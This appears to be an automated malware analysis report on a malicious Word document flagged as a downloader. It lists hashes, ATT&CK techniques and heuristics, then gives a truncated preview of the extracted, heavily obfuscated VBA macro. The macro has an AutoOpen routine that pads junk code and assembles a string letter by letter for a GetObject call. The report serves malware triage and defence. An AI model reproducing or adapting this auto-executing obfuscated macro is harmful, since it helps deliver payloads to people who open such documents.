Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 281b52eff11afbba…

MALICIOUS

Office (OLE)

Size: 262.5 KB
Created: 2018-04-19 18:59:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 81624c04d51444e2388126dcde1f07ce
SHA-1: 423c585f6b518577c169082da287ea0644e02c45
SHA-256: 281b52eff11afbba6b1f7c771b94e6b64f54a9ac5cec394df0488c422de964b3
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1204.002 Malicious File

The sample is a malicious Microsoft Office document containing a VBA macro with an AutoOpen subroutine. This macro is designed to execute a secondary payload, as indicated by the 'GetObject' call and the ClamAV detection name 'Doc.Downloader.Valyria-6595163-0'. The presence of the AutoOpen macro and the GetObject call strongly suggests an attempt to download and execute a malicious second-stage payload, typical of a spearphishing attachment.

Heuristics (7)

  • ClamAV: Doc.Downloader.Valyria-6595163-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 80976 bytes
SHA-256: 02984bf8f715029b442972e0a2e9f0c76ca056fa6bc41baf51d17a9b38c5a863

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub ginOBEawihelIMIQUwEQUCA()
PIxALucOLAWuQEq = InStr("LarAdONIvIS", "LarAdONIvISLarAdONIvIS")


Debug.Print "iyjiQYsIGeB"
Debug.Print "hEJuTeBademOnyUv"
End Sub
Sub AutoOpen()
On Error Resume Next
Dim disaXAQipeVITIFOFEPEPetY
disaXAQipeVITIFOFEPEPetY = Rnd(116)
If disaXAQipeVITIFOFEPEPetY > 77413 Then
   disaXAQipeVITIFOFEPEPetY = Exp(6)
End If
Debug.Print "xEdamiPOSzyKAzy"

XuSYaGAbATituQiHEQUiyJE = 9353
Dim JAJTAzysoKEJAS
JAJTAzysoKEJAS = Rnd(107)
If JAJTAzysoKEJAS > 53264 Then
   JAJTAzysoKEJAS = Exp(7)
End If
Dim RIpEsihifEM
RIpEsihifEM = Log(7)

RIpEsihifEM = RIpEsihifEM + Log(11)

Debug.Print "NaFoBuYfixarut"
LUhIZeJAFiTIVe = InStr("bijYkIvyzagEQukawEiUi", "bijYkIvyzagEQukawEiUibijYkIvyzagEQukawEiUi")
CiSoLelTOKoCubUjAMuBU = ""
Debug.Print "mupyXefeSUFOpUp"
NUtARAPeqUPY = InStr("HyZYfAfoRyteQylOLucu", "HyZYfAfoRyteQylOLucuHyZYfAfoRyteQylOLucu")
Dim FAlOQoZazeKOMu
xUiejOwiqAs = Val("71369.1") & "rozylEdAWYHjIfuXa"
FAlOQoZazeKOMu = Rnd(129)
DIxoQEKowuTuHYe = Val("11095.6") & "aJIgonKPAVOrUBYVYvU"
If FAlOQoZazeKOMu > 98873 Then
Debug.Print "zDxoWAKykaMiCyXYd"
Dim NUrIguMyZaFIqIrkAlaie
For NUrIguMyZaFIqIrkAlaie = 5 To 10
   Dim FIWOCFOSIpxEcuxY
   FIWOCFOSIpxEcuxY = Fix(88763)
Next
   FAlOQoZazeKOMu = Exp(9)
guXuXuTYsIaUHiCOXEGA = 99821
ZiDimAjOrizoxiiEFYk = 11584
End If

duKeTOMEnYKeailUKEnYa = InStr("JIhOByzIVAbOGaCIgOzeTI", "JIhOByzIVAbOGaCIgOzeTIJIhOByzIVAbOGaCIgOzeTI")
JylAaYJUpYmILElIs = 80468

KaxeMozEgefosEqApy = Val("36692.3") & "EHOxoZYCAP"
 CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((273 + 546) = 819, "s", "CgA")

Debug.Print "jOtYJIreFUxaw"
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((331 + 662) = 993, "c", "tW9")
PASAtoZixYPUCUvitot = InStr("WaspAqsiSoRAkEG", "WaspAqsiSoRAkEGWaspAqsiSoRAkEG")

Dim xHamivygajETUVawyBUsu
beMImOzEZOxUcawOdeh = InStr("TudYJoWeGEFyJUsaxUbiS", "TudYJoWeGEFyJUsaxUbiSTudYJoWeGEFyJUsaxUbiS")
Dim toBUMUsaVaQUmyh
toBUMUsaVaQUmyh = Log(7)

toBUMUsaVaQUmyh = toBUMUsaVaQUmyh + Log(12)
xHamivygajETUVawyBUsu = Rnd(105)
If xHamivygajETUVawyBUsu > 50599 Then
XeXelAVoXULHaNvYT = Val("69254.8") & "pycijaQyNoWe"
Dim TIWUauKAhIpIWSOio
TIWUauKAhIpIWSOio = Rnd(124)
If TIWUauKAhIpIWSOio > 59098 Then
   TIWUauKAhIpIWSOio = Exp(4)
End If
   xHamivygajETUVawyBUsu = Exp(5)
NUFgUaQUgyxY = 37883
Debug.Print "fuGiGyNudoTAHoryZq"
End If
CiEDemopAboDyiaAJIRah = 21984
KENacOqUFISAsAm = InStr("aacYvUmYLalIbO", "aacYvUmYLalIbOaacYvUmYLalIbO")
Debug.Print "uSiPIxocOJYtVDunAjI"
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((246 + 492) = 738, "r", "pY")
lemAitOveSADIoxEja = Val("92589.6") & "zUaeqecokuGiCaQohATUM"
Dim iUxOtiaIaXYnOjlatyW
For iUxOtiaIaXYnOjlatyW = 7 To 12
   Dim zoBEluqykiweNoliBeos
   zoBEluqykiweNoliBeos = Fix(55907)
Next

Debug.Print "iTaNIWOQyKIcUVUSAGU"
pICeiIbYTyMIx = InStr("DOLAFoXibADAPaiAkej", "DOLAFoXibADAPaiAkejDOLAFoXibADAPaiAkej")
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((65 + 130) = 195, "i", "b1EW")
pOSjUPIXEKoXOMO = Val("7892.4") & "rUZYlYPUDIP"
CohusSuayVeceMace = 70261
Debug.Print "biHADoNobUvaJot"
zaGYBahzohYbUayGoHaqah = InStr("GeNseJlOHEvaF", "GeNseJlOHEvaFGeNseJlOHEvaF")

Dim POheiYDEVYjYDUwyqUNyz
For POheiYDEVYjYDUwyqUNyz = 7 To 11
   Dim xuRyFIVakeJagudyDea
   xuRyFIVakeJagudyDea = Fix(35995)
Next
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((141 + 282) = 423, "p", "1q")

Debug.Print "DaPUbIJOLuZoFiBIvIfokOZo"
xUqakAdUdOiex = InStr("sYfOcUKEGeDnygONew", "sYfOcUKEGeDnygONewsYfOcUKEGeDnygONew")
CiSoLelTOKoCubUjAMuBU = CiSoLelTOKoCubUjAMuBU + IIf((299 + 598) = 897, "t", "78Pq")
RuFoPOGEgEfAGm = InStr("KOTImuRArYhIJO", "KOTImuRArYhIJOKOTImuRArYhIJO")
NICkOLoLizAgI = 59205

Dim ZyMIMicoHaJIjiNoMufo
ZyMIMicoHaJIjiNoMufo = Log(9)

ZyMIMicoHaJ
... (truncated)